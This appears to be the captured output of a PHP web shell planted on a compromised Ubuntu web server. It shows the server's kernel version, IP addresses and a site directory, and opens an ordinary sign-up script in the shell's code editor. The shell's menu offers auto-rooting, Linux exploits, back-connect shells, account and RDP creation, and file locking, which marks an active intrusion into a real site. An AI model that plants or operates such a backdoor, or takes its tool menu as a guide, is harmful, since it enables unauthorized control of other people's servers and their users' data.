Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.16.47.126
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
PrathibhaKaranji_stop /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
pg
[ DIR ]
drwxr-xr-x
.DS_Store
7.99
KB
-rwxr-xr-x
MainPageCompressed.js
341.08
KB
-rwxr-xr-x
admin.js
15.25
KB
-rwxr-xr-x
advanced-form-elements.js
5.53
KB
-rwxr-xr-x
bcuregn.js
6.94
KB
-rwxr-xr-x
compressed.js
440.45
KB
-rwxr-xr-x
control.js
18.43
KB
-rwxr-xr-x
demo.js
3.33
KB
-rwxr-xr-x
forgot-password.js
3.24
KB
-rwxr-xr-x
form_submit.js
1.3
KB
-rwxr-xr-x
helpers.js
576
B
-rwxr-xr-x
kusPhdAdm.js
21.78
KB
-rwxr-xr-x
kusPhdAdm_24092018.js
29.74
KB
-rwxr-xr-x
login.js
478
B
-rwxr-xr-x
photoCrop.js
1.91
KB
-rwxr-xr-x
script.js
3
B
-rwxr-xr-x
sign-in.js
4.29
KB
-rwxr-xr-x
sign-up.js
3.65
KB
-rwxr-xr-x
upload.js
5.54
KB
-rwxr-xr-x
validate.js
9.29
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sign-up.js
function validateRegno() { if (!$("#validateform").valid()) { return; } var parameters = `&mobile=${$("#idmobile").val()}`; $.ajax({ type: "post", url: "validateRegno.php", data: parameters, success: function(response) { var { status, result, name } = JSON.parse(response); if (status == "invalid") { var { msg } = JSON.parse(response); swal({ title: msg, type: "warning", showCancelButton: false, confirmButtonColor: "#5495ff", confirmButtonText: "OK", closeOnConfirm: false }); } else if (status == "success") { swal({ title: "OTP Sent to your mobile.", type: "success", showCancelButton: false, confirmButtonColor: "#5495ff", confirmButtonText: "OK", closeOnConfirm: false }); $(".card1").css("margin-top", "0%"); $("#hrule").css("display", "none"); $("#sign-up-scroll").slimScroll({ height: "650px" }); $("#ddpname").html(`DDPI Officer Name : ${name}`); $("#perinfo").css("display", "block"); $("#sendpasswd").css("display", "none"); $("#sendotp").css("display", "none"); $("#sendotpform").show(); //sendotp } } }); } function validateInfo() { // if (!$("#sendotpform").valid()) { // return; // } var parameters = `&mobile=${$("#idmobile").val()}&password=${$( "#password" ).val()}`; $.ajax({ type: "post", url: "sendMobEmailOTP.php", data: parameters, success: function(response) { var { status, sms } = JSON.parse(response); if (sms == "Sent.") { $("#sendotp").html("Re-Send OTP"); $("#mobile").attr("disabled", "true"); $("#state").attr("disabled", "true"); $("#univ").attr("disabled", "true"); $("#dob").attr("disabled", "true"); $("#password").attr("disabled", "true"); //cpassword $("#cpassword").attr("disabled", "true"); } } }); } function signup() { if (!$("#sendotpform").valid()) { return; } var parameters = `&mobile=${$("#idmobile").val()}&password=${$( "#password" ).val()}&motp=${$("#motp").val()}&nodaloffname=${$( "#nodaloffname" ).val()}&nodaloffmob=${$("#nodaloffmob").val()}`; $.ajax({ type: "post", url: "signup.php", data: parameters, success: function(response) { var { status } = JSON.parse(response); if (status == "success") { swal( { title: "You have registered successfully", text: "Click OK to continue", type: "success", showCancelButton: false, confirmButtonColor: "#5495ff", confirmButtonText: "OK", closeOnConfirm: false }, function() { window.location.href = "index.html"; // signInWithSignup($('#idmobile').val(), $('#password').val()); } ); } else { swal({ title: "Invalid OTP. Try resend OTP.", type: "warning", showCancelButton: false, confirmButtonColor: "#5495ff", confirmButtonText: "OK", closeOnConfirm: false }); $("#sendotp").css("display", "block"); } } }); } function signInWithSignup(mobile, passwd) { var parameters = "&mobile=" + mobile + "&passwd=" + passwd.toUpperCase(); $.ajax({ type: "post", url: "signin.php", data: parameters, success: function(response) { if (response === "invalid") { alert("Invalid Login"); } else { window.location.href = "instruction.html"; } } }); }
Close